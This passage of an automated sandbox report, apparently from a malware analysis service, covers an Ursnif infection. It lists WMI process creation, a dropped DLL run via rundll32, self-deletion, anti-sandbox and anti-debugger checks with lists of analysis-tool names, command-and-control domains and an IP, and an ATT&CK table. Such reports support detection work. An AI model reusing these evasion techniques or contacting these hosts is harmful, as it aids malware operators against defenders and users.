Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_70354A03 push ds; retf 0000h
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_703562A0 push es; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_70359301 push ebp; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_70356B54 pushfd ; iretd
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_70357CF3 push ecx; retf
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_7035856E push ebp; retf
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_70349D56 push esp; retf
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_70349758 push esp; retf
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_7038FF41 push ss; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_70331A0A LoadLibraryA,GetProcAddress,

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\fum.cpp
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\fum.cpp

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match | File source: 00000017.00000003.607221952.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.607028050.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.606994412.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.607255595.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.607169997.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.607202425.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.607241313.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.607113605.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.735811134.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5236, type: MEMORYSTR
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe | File deleted: c:\users\user\desktop\start[2021.09.09_15-26].vbs
Source: C:\Windows\System32\wscript.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp | Binary or memory string: AUTORUNSC.EXE
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp | Binary or memory string: EMUL.EXE
            Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp | Binary or memory string: SBIECTRL.EXE
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp | Binary or memory string: $FAKEHTTPSERVER.EXE
            Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp | Binary or memory string: APISPY.EXE
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp | Binary or memory string: REGMON.EXEIK
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp | Binary or memory string: WINDBG.EXE
            Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp | Binary or memory string: SBIESVC.EXE
            Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp | Binary or memory string: SCKTOOL.EXE;HQ
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp | Binary or memory string: IDAQ.EXET
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp | Binary or memory string: IMPORTREC.EXE
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp | Binary or memory string: IMUL.EXE.8
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp | Binary or memory string: WINDUMP.EXE
            Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp | Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
            Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp | Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
            Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp | Binary or memory string: PEID.EXE#Z
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp | Binary or memory string: SYSANALYZER.EXEA
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp | Binary or memory string: PROCMON.EXE
            Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp | Binary or memory string: PETOOLS.EXEJ
            Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp | Binary or memory string: OLLYDBG.EXE
            Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp | Binary or memory string: HOOKEXPLORER.EXE
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp | Binary or memory string: NETSNIFFER.EXEK
            Source: wscript.exe, 00000000.00000003.536145532.00000262BFE13000.00000004.00000001.sdmp | Binary or memory string: D"WINAPIOVERRIDE32.EXE","ETHEREAL.EXE","MBARUN.EXE","REPUX.EXE","WINDBG.EXE","ETTERCAP.EXE","MDPMON.EXE","RUNSAMPLE.EXE","WINDUMP.EXE","FAKEHTTPSERVER.EXE","MMR.EXE","SAMP1E.EXE","WINSPY.EXE","FAKESERVER.EXE","MMR.EXE","SAMPLE.EXE","WIRESHARK.EXE","FIDDLER.EXE","MULTIPOT.EXE","SANDBOXIECRYPTO.EXE","XXX.EXE","FILEMON.EXE","NETSNIFFER.EXE","SANDBOXIEDCOMLAUNCH.EXE")
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp | Binary or memory string: AUTORUNS.EXE@
            Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp | Binary or memory string: HOOKANAAPP.EXE
            Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp | Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp | Binary or memory string: TCPDUMP.EXE
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp | Binary or memory string: FILEMON.EXET
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp | Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp | Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp | Binary or memory string: IDAG.EXE:V
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp | Binary or memory string: REGSHOT.EXE
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp | Binary or memory string: DUMPCAP.EXE
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp | Binary or memory string: WIRESHARK.EXE
            Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp | Binary or memory string: FORTITRACER.EXEA
            Found evasive API chain (may stop execution after checking system information)
            Source: C:\Windows\SysWOW64\rundll32.exe | Evasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
            Source: C:\Windows\System32\wscript.exe TID: 4084 | Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\rundll32.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_7034AC85 FindFirstFileExW,
            Source: rundll32.exe, 00000017.00000003.697749575.00000000006A1000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW0
            Source: rundll32.exe, 00000017.00000003.652715194.00000000006D5000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW

            Anti Debugging:

            Found API chain indicative of debugger detection
            Source: C:\Windows\SysWOW64\rundll32.exe | Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_70340D8D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_70331A0A LoadLibraryA,GetProcAddress,
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_703483FA GetProcessHeap,
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_7034A97E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_70342485 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_7038F0B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_7038EBE6 push dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_7038EFDF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_70340D8D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

            HIPS / PFW / Operating System Protection Evasion:

            Benign windows process drops PE files
            Source: C:\Windows\System32\wscript.exe | File created: fum.cpp.0.dr
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: atl.bigbigpoppa.com
            Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 185.251.90.253 80
            Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: pop.urlovedstuff.com
            Source: rundll32.exe, 00000017.00000002.735668721.0000000003390000.00000002.00020000.sdmp | Binary or memory string: Program Manager
            Source: rundll32.exe, 00000017.00000002.735668721.0000000003390000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: rundll32.exe, 00000017.00000002.735668721.0000000003390000.00000002.00020000.sdmp | Binary or memory string: Progman
            Source: rundll32.exe, 00000017.00000002.735668721.0000000003390000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW,
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW,
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW,
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW,
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW,
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW,
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW,
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW,
            Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_00C26CD6 cpuid
            Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_703310ED GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_70331F7C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_00C26CD6 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp | Binary or memory string: procmon.exe
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp | Binary or memory string: tcpview.exe
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp | Binary or memory string: wireshark.exe
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp | Binary or memory string: avz.exe
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp | Binary or memory string: cports.exe
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp | Binary or memory string: lordpe.exe
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp | Binary or memory string: icesword.exe
            Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp | Binary or memory string: ollydbg.exe
            Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp | Binary or memory string: regshot.exe

            Stealing of Sensitive Information:

            Yara detected Ursnif
            Source: Yara match | File source: 00000017.00000003.607221952.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000017.00000003.607028050.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000017.00000003.606994412.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000017.00000003.607255595.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000017.00000003.607169997.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000017.00000003.607202425.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000017.00000003.607241313.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000017.00000003.607113605.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000017.00000002.735811134.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5236, type: MEMORYSTR

            Remote Access Functionality:

            Yara detected Ursnif
            Source: Yara match | File source: 00000017.00000003.607221952.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000017.00000003.607028050.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000017.00000003.606994412.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000017.00000003.607255595.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000017.00000003.607169997.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000017.00000003.607202425.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000017.00000003.607241313.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000017.00000003.607113605.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000017.00000002.735811134.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5236, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | Windows Management Instrumentation 221 | Path Interception | Process Injection 12 | Disable or Modify Tools 1 | OS Credential Dumping | System Time Discovery 1 | Remote Services | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 3 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Data Encrypted for Impact 1
            Default Accounts | Scripting 121 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Scripting 121 | LSASS Memory | Account Discovery 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Encrypted Channel 2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | Native API 12 | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information 2 | Security Account Manager | File and Directory Discovery 1 | SMB/Windows Admin Shares